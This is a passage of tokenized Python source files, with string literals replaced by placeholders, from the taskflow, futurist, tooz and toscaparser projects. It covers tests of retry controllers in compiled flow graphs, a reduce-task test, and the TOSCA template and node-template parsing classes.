g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , list ( g . no_predecessors_iter ( ) ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , list ( g . no_successors_iter ( ) ) ) <EOL> def test_retry_in_linear_flow_with_tasks ( self ) : <EOL> c = retry . AlwaysRevert ( "<STR_LIT:c>" ) <EOL> a , b = test_utils . make_many ( <NUM_LIT:2> ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" , c ) . add ( a , b ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:5> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT:b>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT:a>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , g . no_predecessors_iter ( ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , g . no_successors_iter ( ) ) <EOL> self . assertIs ( c , g . node [ '<STR_LIT:a>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c , g . node [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] ) <EOL> def test_retry_in_unordered_flow_with_tasks ( self ) : <EOL> c = retry . AlwaysRevert ( "<STR_LIT:c>" ) <EOL> a , b = test_utils . make_many ( <NUM_LIT:2> ) <EOL> flo = uf . Flow ( "<STR_LIT:test>" , c ) . add ( a , b ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:5> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT:a>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT:b>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , list ( g . no_predecessors_iter ( ) ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , list ( g . no_successors_iter ( ) ) ) <EOL> self . assertIs ( c , g . node [ '<STR_LIT:a>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c , g . node [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] ) <EOL> def test_retry_in_graph_flow_with_tasks ( self ) : <EOL> r = retry . AlwaysRevert ( "<STR_LIT:r>" ) <EOL> a , b , c = test_utils . make_many ( <NUM_LIT:3> ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" , r ) . add ( a , b , c ) . link ( b , c ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:r>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:r>' , '<STR_LIT:a>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:r>' , '<STR_LIT:b>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , g . no_predecessors_iter ( ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , g . no_successors_iter ( ) ) <EOL> self . assertIs ( r , g . node [ '<STR_LIT:a>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( r , g . node [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( r , g . node [ '<STR_LIT:c>' ] [ '<STR_LIT>' ] ) <EOL> def test_retries_hierarchy ( self ) : <EOL> c1 = retry . AlwaysRevert ( "<STR_LIT>" ) <EOL> c2 = retry . AlwaysRevert ( "<STR_LIT>" ) <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" , c2 ) . add ( b , c ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" , c1 ) . add ( a , inner_flo , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:10> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:a>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:a>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:d>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c2 , g . node [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c2 , g . node [ '<STR_LIT:c>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( None , g . node [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) ) <EOL> def test_retry_subflows_hierarchy ( self ) : <EOL> c1 = retry . AlwaysRevert ( "<STR_LIT>" ) <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" ) . add ( b , c ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" , c1 ) . add ( a , inner_flo , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:9> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:a>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:a>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:d>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:c>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( None , g . node [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) ) </s>
<s> import taskflow . engines as engines <EOL> from taskflow . patterns import linear_flow <EOL> from taskflow import task as base <EOL> from taskflow import test <EOL> def sum ( x , y ) : <EOL> return x + y <EOL> multiply = lambda x , y : x * y <EOL> class ReduceFunctorTaskTest ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ReduceFunctorTaskTest , self ) . setUp ( ) <EOL> self . flow_store = { <EOL> '<STR_LIT:a>' : <NUM_LIT:1> , <EOL> '<STR_LIT:b>' : <NUM_LIT:2> , <EOL> '<STR_LIT:c>' : <NUM_LIT:3> , <EOL> '<STR_LIT:d>' : <NUM_LIT:4> , <EOL> '<STR_LIT:e>' : <NUM_LIT:5> , <EOL> } <EOL> def test_sum_array ( self ) : <EOL> expected = self . flow_store . copy ( ) <EOL> expected . update ( { <EOL> '<STR_LIT>' : <NUM_LIT:15> <EOL> } ) <EOL> requires = self . flow_store . keys ( ) <EOL> provides = '<STR_LIT>' <EOL> flow = linear_flow . Flow ( "<STR_LIT>" ) <EOL> flow . add ( base . ReduceFunctorTask ( sum , requires = requires , <EOL> provides = provides ) ) <EOL> result = engines . run ( flow , store = self . flow_store ) <EOL> self . assertDictEqual ( expected , result ) <EOL> def test_multiply_array ( self ) : <EOL> expected = self . flow_store . copy ( ) <EOL> expected . update ( { <EOL> '<STR_LIT>' : <NUM_LIT> <EOL> } ) <EOL> requires = self . flow_store . keys ( ) <EOL> provides = '<STR_LIT>' <EOL> flow = linear_flow . Flow ( "<STR_LIT>" ) <EOL> flow . add ( base . ReduceFunctorTask ( multiply , requires = requires , <EOL> provides = provides ) ) <EOL> result = engines . run ( flow , store = self . flow_store ) <EOL> self . assertDictEqual ( expected , result ) </s>
<s> from debtcollector import removals <EOL> import futurist <EOL> removals . removed_module ( __name__ , <EOL> replacement = "<STR_LIT>" % futurist . __name__ , <EOL> version = "<STR_LIT>" , removal_version = '<STR_LIT>' , <EOL> stacklevel = <NUM_LIT:4> ) <EOL> Future = futurist . Future <EOL> ThreadPoolExecutor = futurist . ThreadPoolExecutor <EOL> GreenThreadPoolExecutor = futurist . GreenThreadPoolExecutor <EOL> ProcessPoolExecutor = futurist . ProcessPoolExecutor <EOL> GreenFuture = futurist . GreenFuture <EOL> SynchronousExecutor = futurist . SynchronousExecutor <EOL> ExecutorStatistics = futurist . ExecutorStatistics </s>
<s> import time <EOL> from tooz import coordination <EOL> ALIVE_TIME = <NUM_LIT:5> <EOL> coordinator = coordination . get_coordinator ( '<STR_LIT>' , b'<STR_LIT>' ) <EOL> coordinator . start ( ) <EOL> start = time . time ( ) <EOL> while time . time ( ) - start < ALIVE_TIME : <EOL> coordinator . heartbeat ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> coordinator . stop ( ) </s>
<s> from toscaparser import shell as parser_shell <EOL> """<STR_LIT>""" <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> parser_shell . main ( ) </s>
<s> import logging <EOL> from toscaparser . common . exception import ExceptionCollector <EOL> from toscaparser . common . exception import InvalidPropertyValueError <EOL> from toscaparser . common . exception import MissingRequiredFieldError <EOL> from toscaparser . common . exception import TypeMismatchError <EOL> from toscaparser . common . exception import UnknownFieldError <EOL> from toscaparser . common . exception import ValidationError <EOL> from toscaparser . dataentity import DataEntity <EOL> from toscaparser . elements . interfaces import CONFIGURE <EOL> from toscaparser . elements . interfaces import CONFIGURE_SHORTNAME <EOL> from toscaparser . elements . interfaces import InterfacesDef <EOL> from toscaparser . elements . interfaces import LIFECYCLE <EOL> from toscaparser . elements . interfaces import LIFECYCLE_SHORTNAME <EOL> from toscaparser . elements . relationshiptype import RelationshipType <EOL> from toscaparser . entity_template import EntityTemplate <EOL> from toscaparser . relationship_template import RelationshipTemplate <EOL> from toscaparser . utils . gettextutils import _ <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> class NodeTemplate ( EntityTemplate ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , name , node_templates , custom_def = None , <EOL> available_rel_tpls = None , available_rel_types = None ) : <EOL> super ( NodeTemplate , self ) . __init__ ( name , node_templates [ name ] , <EOL> '<STR_LIT>' , <EOL> custom_def ) <EOL> self . templates = node_templates <EOL> self . _validate_fields ( node_templates [ name ] ) <EOL> self . custom_def = custom_def <EOL> self . related = { } <EOL> self . relationship_tpl = [ ] <EOL> self . available_rel_tpls = available_rel_tpls <EOL> self . available_rel_types = available_rel_types <EOL> self . _relationships = { } <EOL> @ property <EOL> def relationships ( self ) : <EOL> if not self . _relationships : <EOL> requires = self . requirements <EOL> if requires : <EOL> for r in requires : <EOL> for r1 , value in r . items ( ) : <EOL> explicit = self . _get_explicit_relationship ( r , value ) <EOL> if explicit : <EOL> for key , value in explicit . items ( ) : <EOL> self . _relationships [ key ] = value <EOL> return self . _relationships <EOL> def _get_explicit_relationship ( self , req , value ) : <EOL> """<STR_LIT>""" <EOL> explicit_relation = { } <EOL> node = value . get ( '<STR_LIT>' ) if isinstance ( value , dict ) else value <EOL> if node : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % self . name <EOL> if ( node in list ( self . type_definition . TOSCA_DEF . keys ( ) ) <EOL> or node in self . custom_def ) : <EOL> ExceptionCollector . appendException ( NotImplementedError ( msg ) ) <EOL> return <EOL> if node not in self . templates : <EOL> ExceptionCollector . appendException ( <EOL> KeyError ( _ ( '<STR_LIT>' ) % node ) ) <EOL> return <EOL> related_tpl = NodeTemplate ( node , self . templates , self . custom_def ) <EOL> relationship = value . get ( '<STR_LIT>' ) if isinstance ( value , dict ) else None <EOL> if not relationship : <EOL> parent_reqs = self . type_definition . get_all_requirements ( ) <EOL> if parent_reqs is None : <EOL> ExceptionCollector . appendException ( <EOL> ValidationError ( message = '<STR_LIT>' + <EOL> str ( parent_reqs ) ) ) <EOL> else : <EOL> for key in req . keys ( ) : <EOL> for req_dict in parent_reqs : <EOL> if key in req_dict . keys ( ) : <EOL> relationship = ( req_dict . get ( key ) . <EOL> get ( '<STR_LIT>' ) ) <EOL> break <EOL> if relationship : <EOL> found_relationship_tpl = False <EOL> if self . available_rel_tpls : <EOL> for tpl in self . available_rel_tpls : <EOL> if tpl . name == relationship : <EOL> rtype = RelationshipType ( tpl . type , None , <EOL> self . custom_def ) <EOL> explicit_relation [ rtype ] = related_tpl <EOL> tpl . target = related_tpl <EOL> tpl . source = self <EOL> self . relationship_tpl . append ( tpl ) <EOL> found_relationship_tpl = True <EOL> rel_prfx = self . type_definition . RELATIONSHIP_PREFIX <EOL> if not found_relationship_tpl : <EOL> if isinstance ( relationship , dict ) : <EOL> relationship = relationship . get ( '<STR_LIT:type>' ) <EOL> if relationship : <EOL> if self . available_rel_types and relationship in self . available_rel_types . keys ( ) : <EOL> pass <EOL> elif not relationship . startswith ( rel_prfx ) : <EOL> relationship = rel_prfx + relationship <EOL> else : <EOL> ExceptionCollector . appendException ( <EOL> MissingRequiredFieldError ( <EOL> what = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % related_tpl . name , <EOL> required = self . TYPE ) ) <EOL> for rtype in self . type_definition . relationship . keys ( ) : <EOL> if rtype . type == relationship : <EOL> explicit_relation [ rtype ] = related_tpl <EOL> related_tpl . _add_relationship_template ( req , <EOL> rtype . type , <EOL> self ) <EOL> elif self . available_rel_types : <EOL> if relationship in self . available_rel_types . keys ( ) : <EOL> rel_type_def = self . available_rel_types . get ( relationship ) <EOL> if '<STR_LIT>' in rel_type_def : <EOL> super_type = rel_type_def . get ( '<STR_LIT>' ) <EOL> if not super_type . startswith ( rel_prfx ) : <EOL> super_type = rel_prfx + super_type <EOL> if rtype . type == super_type : <EOL> explicit_relation [ rtype ] = related_tpl <EOL> related_tpl . _add_relationship_template ( <EOL> req , rtype . type , self ) <EOL> return explicit_relation <EOL> def _add_relationship_template ( self , requirement , rtype , source ) : <EOL> req = requirement . copy ( ) <EOL> req [ '<STR_LIT:type>' ] = rtype <EOL> tpl = RelationshipTemplate ( req , rtype , self . custom_def , self , source ) <EOL> self . relationship_tpl . append ( tpl ) <EOL> def get_relationship_template ( self ) : <EOL> return self . relationship_tpl <EOL> def _add_next ( self , nodetpl , relationship ) : <EOL> self . related [ nodetpl ] = relationship <EOL> @ property <EOL> def related_nodes ( self ) : <EOL> if not self . related : <EOL> for relation , node in self . type_definition . relationship . items ( ) : <EOL> for tpl in self . templates : <EOL> if tpl == node . type : <EOL> self . related [ NodeTemplate ( tpl ) ] = relation <EOL> return self . related . keys ( ) <EOL> def validate ( self , tosca_tpl = None ) : <EOL> self . _validate_capabilities ( ) <EOL> self . _validate_requirements ( ) <EOL> self . _validate_properties ( self . entity_tpl , self . type_definition ) <EOL> self . _validate_interfaces ( ) <EOL> for prop in self . get_properties_objects ( ) : <EOL> prop . validate ( ) <EOL> def _validate_requirements ( self ) : <EOL> type_requires = self . type_definition . get_all_requirements ( ) <EOL> allowed_reqs = [ "<STR_LIT>" ] <EOL> if type_requires : <EOL> for treq in type_requires : <EOL> for key , value in treq . items ( ) : <EOL> allowed_reqs . append ( key ) <EOL> if isinstance ( value , dict ) : <EOL> for key in value : <EOL> allowed_reqs . append ( key ) <EOL> requires = self . type_definition . get_value ( self . REQUIREMENTS , <EOL> self . entity_tpl ) <EOL> if requires : <EOL> if not isinstance ( requires , list ) : <EOL> ExceptionCollector . appendException ( <EOL> TypeMismatchError ( <EOL> what = '<STR_LIT>' % self . name , <EOL> type = '<STR_LIT:list>' ) ) <EOL> for req in requires : <EOL> for r1 , value in req . items ( ) : <EOL> if isinstance ( value , dict ) : <EOL> self . _validate_requirements_keys ( value ) <EOL> self . _validate_requirements_properties ( value ) <EOL> allowed_reqs . append ( r1 ) <EOL> self . _common_validate_field ( req , allowed_reqs , '<STR_LIT>' ) <EOL> def _validate_requirements_properties ( self , requirements ) : <EOL> for key , value in requirements . items ( ) : <EOL> if key == '<STR_LIT>' : <EOL> self . _validate_occurrences ( value ) <EOL> break <EOL> def _validate_occurrences ( self , occurrences ) : <EOL> DataEntity . validate_datatype ( '<STR_LIT:list>' , occurrences ) <EOL> for value in occurrences : <EOL> DataEntity . validate_datatype ( '<STR_LIT>' , value ) <EOL> if len ( occurrences ) != <NUM_LIT:2> or not ( <NUM_LIT:0> <= occurrences [ <NUM_LIT:0> ] <= occurrences [ <NUM_LIT:1> ] ) or occurrences [ <NUM_LIT:1> ] == <NUM_LIT:0> : <EOL> ExceptionCollector . appendException ( <EOL> InvalidPropertyValueError ( what = ( occurrences ) ) ) <EOL> def _validate_requirements_keys ( self , requirement ) : <EOL> for key in requirement . keys ( ) : <EOL> if key not in self . REQUIREMENTS_SECTION : <EOL> ExceptionCollector . appendException ( <EOL> UnknownFieldError ( <EOL> what = '<STR_LIT>' % self . name , <EOL> field = key ) ) <EOL> def _validate_interfaces ( self ) : <EOL> ifaces = self . type_definition . get_value ( self . INTERFACES , <EOL> self . entity_tpl ) <EOL> if ifaces : <EOL> for i in ifaces : <EOL> for name , value in ifaces . items ( ) : <EOL> if name in ( LIFECYCLE , LIFECYCLE_SHORTNAME ) : <EOL> self . _common_validate_field ( <EOL> value , InterfacesDef . <EOL> interfaces_node_lifecycle_operations , <EOL> '<STR_LIT>' ) <EOL> elif name in ( CONFIGURE , CONFIGURE_SHORTNAME ) : <EOL> self . _common_validate_field ( <EOL> value , InterfacesDef . <EOL> interfaces_relationship_configure_operations , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> ExceptionCollector . appendException ( <EOL> UnknownFieldError ( <EOL> what = '<STR_LIT>' % <EOL> self . name , field = name ) ) <EOL> def _validate_fields ( self , nodetemplate ) : <EOL> for name in nodetemplate . keys ( ) : <EOL> if name not in self . SECTIONS and name not in self . SPECIAL_SECTIONS : <EOL> ExceptionCollector . appendException ( <EOL> UnknownFieldError ( what = '<STR_LIT>' % self . name , <EOL> field = name ) ) </s>
<s> import logging <EOL> import os <EOL> from toscaparser . common . exception import ExceptionCollector <EOL> from toscaparser . common . exception import InvalidTemplateVersion <EOL> from toscaparser . common . exception import MissingRequiredFieldError <EOL> from toscaparser . common . exception import UnknownFieldError <EOL> from toscaparser . common . exception import ValidationError <EOL> from toscaparser . elements . entity_type import update_definitions <EOL> from toscaparser . extensions . exttools import ExtTools <EOL> import toscaparser . imports <EOL> from toscaparser . prereq . csar import CSAR <EOL> from toscaparser . topology_template import TopologyTemplate <EOL> from toscaparser . tpl_relationship_graph import ToscaGraph <EOL> from toscaparser . utils . gettextutils import _ <EOL> import toscaparser . utils . yamlparser <EOL> SECTIONS = ( DEFINITION_VERSION , DEFAULT_NAMESPACE , TEMPLATE_NAME , <EOL> TOPOLOGY_TEMPLATE , TEMPLATE_AUTHOR , TEMPLATE_VERSION , <EOL> DESCRIPTION , IMPORTS , DSL_DEFINITIONS , NODE_TYPES , <EOL> RELATIONSHIP_TYPES , RELATIONSHIP_TEMPLATES , <EOL> CAPABILITY_TYPES , ARTIFACT_TYPES , DATA_TYPES , <EOL> POLICY_TYPES , GROUP_TYPES , REPOSITORIES ) = ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:description>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> SPECIAL_SECTIONS = ( METADATA ) = ( '<STR_LIT>' ) <EOL> log = logging . getLogger ( "<STR_LIT>" ) <EOL> YAML_LOADER = toscaparser . utils . yamlparser . load_yaml <EOL> class ToscaTemplate ( object ) : <EOL> exttools = ExtTools ( ) <EOL> VALID_TEMPLATE_VERSIONS = [ '<STR_LIT>' ] <EOL> VALID_TEMPLATE_VERSIONS . extend ( exttools . get_versions ( ) ) <EOL> ADDITIONAL_SECTIONS = { '<STR_LIT>' : SPECIAL_SECTIONS } <EOL> ADDITIONAL_SECTIONS . update ( exttools . get_sections ( ) ) <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , path = None , parsed_params = None , a_file = True , <EOL> yaml_dict_tpl = None ) : <EOL> ExceptionCollector . start ( ) <EOL> self . a_file = a_file <EOL> self . input_path = None <EOL> self . path = None <EOL> self . tpl = None <EOL> if path : <EOL> self . input_path = path <EOL> self . path = self . _get_path ( path ) <EOL> if self . path : <EOL> self . tpl = YAML_LOADER ( self . path , self . a_file ) <EOL> if yaml_dict_tpl : <EOL> msg = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> log . info ( msg ) <EOL> print ( msg ) <EOL> else : <EOL> if yaml_dict_tpl : <EOL> self . tpl = yaml_dict_tpl <EOL> else : <EOL> ExceptionCollector . appendException ( <EOL> ValueError ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) ) <EOL> if self . tpl : <EOL> self . parsed_params = parsed_params <EOL> self . _validate_field ( ) <EOL> self . version = self . _tpl_version ( ) <EOL> self . relationship_types = self . _tpl_relationship_types ( ) <EOL> self . description = self . _tpl_description ( ) <EOL> self . topology_template = self . _topology_template ( ) <EOL> if self . topology_template . tpl : <EOL> self . inputs = self . _inputs ( ) <EOL> self . relationship_templates = self . _relationship_templates ( ) <EOL> self . nodetemplates = self . _nodetemplates ( ) <EOL> self . outputs = self . _outputs ( ) <EOL> self . graph = ToscaGraph ( self . nodetemplates ) <EOL> ExceptionCollector . stop ( ) <EOL> self . verify_template ( ) <EOL> def _topology_template ( self ) : <EOL> return TopologyTemplate ( self . _tpl_topology_template ( ) , <EOL> self . _get_all_custom_defs ( ) , <EOL> self . relationship_types , <EOL> self . parsed_params ) <EOL> def _inputs ( self ) : <EOL> return self . topology_template . inputs <EOL> def _nodetemplates ( self ) : <EOL> return self . topology_template . nodetemplates <EOL> def _relationship_templates ( self ) : <EOL> return self . topology_template . relationship_templates <EOL> def _outputs ( self ) : <EOL> return self . topology_template . outputs <EOL> def _tpl_version ( self ) : <EOL> return self . tpl . get ( DEFINITION_VERSION ) <EOL> def _tpl_description ( self ) : <EOL> desc = self . tpl . get ( DESCRIPTION ) <EOL> if desc : <EOL> return desc . rstrip ( ) <EOL> def _tpl_imports ( self ) : <EOL> return self . tpl . get ( IMPORTS ) <EOL> def _tpl_relationship_types ( self ) : <EOL> return self . _get_custom_types ( RELATIONSHIP_TYPES ) <EOL> def _tpl_relationship_templates ( self ) : <EOL> topology_template = self . _tpl_topology_template ( ) <EOL> return topology_template . get ( RELATIONSHIP_TEMPLATES ) <EOL> def _tpl_topology_template ( self ) : <EOL> return self . tpl . get ( TOPOLOGY_TEMPLATE ) <EOL> def _get_all_custom_defs ( self , imports = None ) : <EOL> types = [ IMPORTS , NODE_TYPES , CAPABILITY_TYPES , RELATIONSHIP_TYPES , <EOL> DATA_TYPES , POLICY_TYPES , GROUP_TYPES ] <EOL> custom_defs_final = { } <EOL> custom_defs = self . _get_custom_types ( types , imports ) <EOL> if custom_defs : <EOL> custom_defs_final . update ( custom_defs ) <EOL> if custom_defs . get ( IMPORTS ) : <EOL> import_defs = self . _get_all_custom_defs ( <EOL> custom_defs . get ( IMPORTS ) ) <EOL> custom_defs_final . update ( import_defs ) <EOL> custom_defs_final . pop ( IMPORTS , None ) <EOL> return custom_defs_final <EOL> def _get_custom_types ( self , type_definitions , imports = None ) : <EOL> """<STR_LIT>""" <EOL> custom_defs = { } <EOL> type_defs = [ ] <EOL> if not isinstance ( type_definitions , list ) : <EOL> type_defs . append ( type_definitions ) <EOL> else : <EOL> type_defs = type_definitions <EOL> if not imports : <EOL> imports = self . _tpl_imports ( ) <EOL> if imports : <EOL> custom_defs = toscaparser . imports . ImportsLoader ( imports , self . path , <EOL> type_defs , self . tpl ) . get_custom_defs ( ) <EOL> if not custom_defs : <EOL> return <EOL> for type_def in type_defs : <EOL> if type_def != IMPORTS : <EOL> inner_custom_types = self . tpl . get ( type_def ) or { } <EOL> if inner_custom_types : <EOL> custom_defs . update ( inner_custom_types ) <EOL> return custom_defs <EOL> def _validate_field ( self ) : <EOL> version = self . _tpl_version ( ) <EOL> if not version : <EOL> ExceptionCollector . appendException ( <EOL> MissingRequiredFieldError ( what = '<STR_LIT>' , <EOL> required = DEFINITION_VERSION ) ) <EOL> else : <EOL> self . _validate_version ( version ) <EOL> self . version = version <EOL> for name in self . tpl : <EOL> if ( name not in SECTIONS and <EOL> name not in self . ADDITIONAL_SECTIONS . get ( version , ( ) ) ) : <EOL> ExceptionCollector . appendException ( <EOL> UnknownFieldError ( what = '<STR_LIT>' , field = name ) ) <EOL> def _validate_version ( self , version ) : <EOL> if version not in self . VALID_TEMPLATE_VERSIONS : <EOL> ExceptionCollector . appendException ( <EOL> InvalidTemplateVersion ( <EOL> what = version , <EOL> valid_versions = '<STR_LIT:U+002CU+0020>' . join ( self . VALID_TEMPLATE_VERSIONS ) ) ) <EOL> else : <EOL> if version != '<STR_LIT>' : <EOL> update_definitions ( version ) <EOL> def _get_path ( self , path ) : <EOL> if path . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> return path <EOL> elif path . lower ( ) . endswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> csar = CSAR ( path , self . a_file ) <EOL> if csar . validate ( ) : <EOL> csar . decompress ( ) <EOL> self . a_file = True <EOL> return os . path . join ( csar . temp_dir , csar . get_main_template ( ) ) <EOL> else : <EOL> ExceptionCollector . appendException ( <EOL> ValueError ( _ ( '<STR_LIT>' ) <EOL> % { '<STR_LIT:path>' : path } ) ) <EOL> def verify_template ( self ) : <EOL> if ExceptionCollector . exceptionsCaught ( ) : <EOL> if self . input_path : <EOL> raise ValidationError ( <EOL> message = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> % { '<STR_LIT:path>' : self . input_path } ) + <EOL> '<STR_LIT>' . join ( ExceptionCollector . getExceptionsReport ( ) ) ) <EOL> else : <EOL> raise ValidationError ( <EOL> message = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) + <EOL> '<STR_LIT>' . join ( ExceptionCollector . getExceptionsReport ( ) ) ) <EOL> else : <EOL> if self . input_path : <EOL> msg = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % { 